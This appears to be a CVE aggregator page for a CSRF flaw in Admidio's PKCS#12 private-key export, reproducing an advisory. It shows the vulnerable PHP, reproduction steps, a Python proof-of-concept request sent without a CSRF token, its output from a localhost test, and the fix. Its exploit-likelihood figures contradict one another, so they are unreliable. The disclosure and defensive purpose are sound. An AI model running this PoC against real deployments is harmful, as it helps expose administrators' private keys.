CVE-2026-47232

MEDIUMPre-NVD 4.34.3
EchelonGraph scoreLOW confidence

This medium-severity CVE scores 4.3 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.0%, top 99% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
4.3
EchelonGraph verdictMonitorLow exploitation likelihood right now — keep watching.
  • Lower severity and no public exploit yet
CISA-KEV: Not listedEPSS: 0%CVSS: 4.3Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Admidio PKCS#12 private key export action lacks CSRF protection

Summary

The sensitive mode=export action in modules/sso/keys.php exports a PKCS#12 bundle containing the configured private key and certificate, but the CSRF validation line is commented out. A forged cross-site POST from an administrator session can therefore trigger private key export without a valid form token.

Vulnerable Code Links

  • https://github.com/Admidio/admidio/blob/v5.0.9/modules/sso/keys.php#L83-L94
  • https://github.com/Admidio/admidio/blob/v5.0.9/src/SSO/Service/KeyService.php#L108-L150

Vulnerable Code

// modules/sso/keys.php
case 'export':
// SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
$keyService = new KeyService($gDb);
$password = admFuncVariableIsValid($_POST, 'key_password', 'string');
$keyService->exportToPkcs12($getKeyUUID, $password);
break;

// src/SSO/Service/KeyService.php
public function exportToPkcs12(string $keyUUID, string $password = '') {
$ssoKey = new Key($this->db);
$ssoKey->readDataByUuid($keyUUID);
...
openssl_pkcs12_export($certificate, $pkcs12, $privateKey, $password, ["friendly_name" => $name]);
header('Content-Type: application/x-pkcs12');
header('Content-Disposition: attachment; filename="' . $filename . '.p12"');
echo $pkcs12;
exit;
}

What Does The Code Mean

The export route accepts a key UUID and export password from the request, then returns a PKCS#12 bundle containing the private key material and certificate as a direct browser download.

Why The Code Is Vulnerable

The route is a sensitive action and should require a valid anti-CSRF token. Because the validation call is commented out, any attacker-controlled page can force an authenticated administrator’s browser to perform the export request.

Verification Environment

  • Application: Admidio v5.0.9
  • Runtime: Dockerized Admidio + MariaDB on http://localhost:18080
  • Validation mode: real deployed application, not isolated unit tests

Steps To Reproduce

  • Log in as an administrator.
  • Create or seed an SSO key pair.
  • Send a POST request to /modules/sso/keys.php?mode=export&uuid= with only key_password=ExportPass123! and no adm_csrf_token.
  • Verify that the response returns application/x-pkcs12 and that the returned file parses successfully with OpenSSL.

PoC Script

import os
from pathlib import Path

from helpers import BASE_URL, login, new_session, save_json, save_text

KEY_UUID = os.environ["ADMIDIO_KEY_UUID"]

def main(): session = new_session() login_result = login(session, "admin", "AdminPass123!") resp = session.post( f"{BASE_URL}/modules/sso/keys.php?mode=export&uuid={KEY_UUID}", data={"key_password": "ExportPass123!"}, ) resp.raise_for_status()

Path("/home/ubuntu/bughunting/admidio/runtime_validation/output/exported_key.p12").write_bytes(resp.content) save_json( "pkcs12_export_csrf_result.json", { "login": login_result, "status_code": resp.status_code, "content_type": resp.headers.get("Content-Type"), "content_length": len(resp.content), "content_disposition": resp.headers.get("Content-Disposition"), }, )

if __name__ == "__main__": main()

PoC Output

{
  "content_disposition": "attachment; filename=\"Runtime_Test_Key.p12\"",
  "content_length": 2644,
  "content_type": "application/x-pkcs12",
  "login": {
"cookies": {
  "ADMIDIO_admidio_adm_SESSION_ID": "jpk70tcvbaq3gof7lqdq6penkb"
},
"csrf": "ztUJwMPATEKBdu2Qw3oJlnD0WeWLcn",
"json": {
  "status": "success",
  "url": "http://localhost:18080/modules/overview.php"
},
"status_code": 200
  },
  "status_code": 200
}

MAC: sha256, Iteration 2048 MAC length: 32, salt length: 8 PKCS7 Encrypted data: PBES2, PBKDF2, AES-256-CBC, Iteration 2048, PRF hmacWithSHA256 Certificate bag PKCS7 Data Shrouded Keybag: PBES2, PBKDF2, AES-256-CBC, Iteration 2048, PRF hmacWithSHA256

Impact

A cross-site request can trigger private key export in an administrator browser context. Same-origin policy normally prevents direct cross-site reading of the response, so the practical impact is lower than a direct exfiltration bug, but the application still performs a sensitive secret-export action without CSRF protection.

Remediation And Suggestions

Restore CSRF validation and require a POST body token before exporting private key material.

case 'export':
SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
$keyService = new KeyService($gDb);
$password = admFuncVariableIsValid($_POST, 'key_password', 'string');
$keyService->exportToPkcs12($getKeyUUID, $password);
break;

For additional hardening, consider requiring re-authentication or current-password confirmation before any private-key export.

CVSS v3
4.3
EG Score
4.3(low)
EPSS
1.0%
KEV
Not listed

Published

May 29, 2026

Last Modified

May 29, 2026

Vendor Advisories for CVE-2026-47232(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
Packagist(1)
PackageVulnerable rangeFixed inDependents
admidio/admidio4.1.0 ... v5.0.9 (55 versions)5.0.10

Data Freshness Timeline

(refreshed 3× in last 7d / 15× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-16 01:46 UTCEG score recompute
  2. 2026-07-14 13:51 UTCEG score recompute
  3. 2026-07-11 16:59 UTCEG score recompute
  4. 2026-07-08 17:15 UTCEG score recompute
  5. 2026-07-02 03:44 UTCEG score recompute
  6. 2026-07-01 01:17 UTCEG score recompute
  7. 2026-06-29 21:40 UTCEG score recompute
  8. 2026-06-28 22:56 UTCEG score recompute
  9. 2026-06-28 00:08 UTCEG score recompute
  10. 2026-06-27 01:23 UTCEG score recompute
  11. 2026-06-26 01:49 UTCEG score recompute
  12. 2026-06-25 01:31 UTCEG score recompute
  13. 2026-06-24 02:46 UTCEG score recompute
  14. 2026-06-18 02:06 UTCEG score recompute
  15. 2026-06-17 03:21 UTCEG score recompute
  16. 2026-06-16 04:37 UTCEG score recompute
  17. 2026-06-15 05:47 UTCEG score recompute
  18. 2026-06-14 23:18 UTCEPSS rescore
  19. 2026-06-14 07:03 UTCEG score recompute
  20. 2026-06-13 23:00 UTCEPSS rescore
  21. 2026-06-13 08:18 UTCEG score recompute
  22. 2026-06-12 23:12 UTCEPSS rescore
  23. 2026-06-12 09:33 UTCEG score recompute
  24. 2026-06-11 10:48 UTCEG score recompute
  25. 2026-06-10 12:03 UTCEG score recompute
Show 11 more
  1. 2026-06-09 13:19 UTCEG score recompute
  2. 2026-06-08 14:35 UTCEG score recompute
  3. 2026-06-07 15:51 UTCEG score recompute
  4. 2026-06-06 17:07 UTCEG score recompute
  5. 2026-06-05 18:23 UTCEG score recompute
  6. 2026-06-04 19:39 UTCEG score recompute
  7. 2026-06-03 20:55 UTCEG score recompute
  8. 2026-06-02 22:10 UTCEG score recompute
  9. 2026-06-01 23:25 UTCEG score recompute
  10. 2026-06-01 00:41 UTCEG score recompute
  11. 2026-05-29 22:26 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-47232?
CVE-2026-47232 is a medium vulnerability published on May 29, 2026. Admidio PKCS#12 private key export action lacks CSRF protection Summary The sensitive mode=export action in modules/sso/keys.php exports a PKCS#12 bundle containing the configured private key and certificate, but the CSRF validation line is commented out. A forged cross-site POST from an…
When was CVE-2026-47232 disclosed?
CVE-2026-47232 was first published in the National Vulnerability Database on May 29, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-47232 actively exploited?
CVE-2026-47232 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 1.0% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-47232?
CVE-2026-47232 has a CVSS v4.0 base score of 4.3 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-47232?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-47232, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-47232

Explore →

Is Your Infrastructure Affected by CVE-2026-47232?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.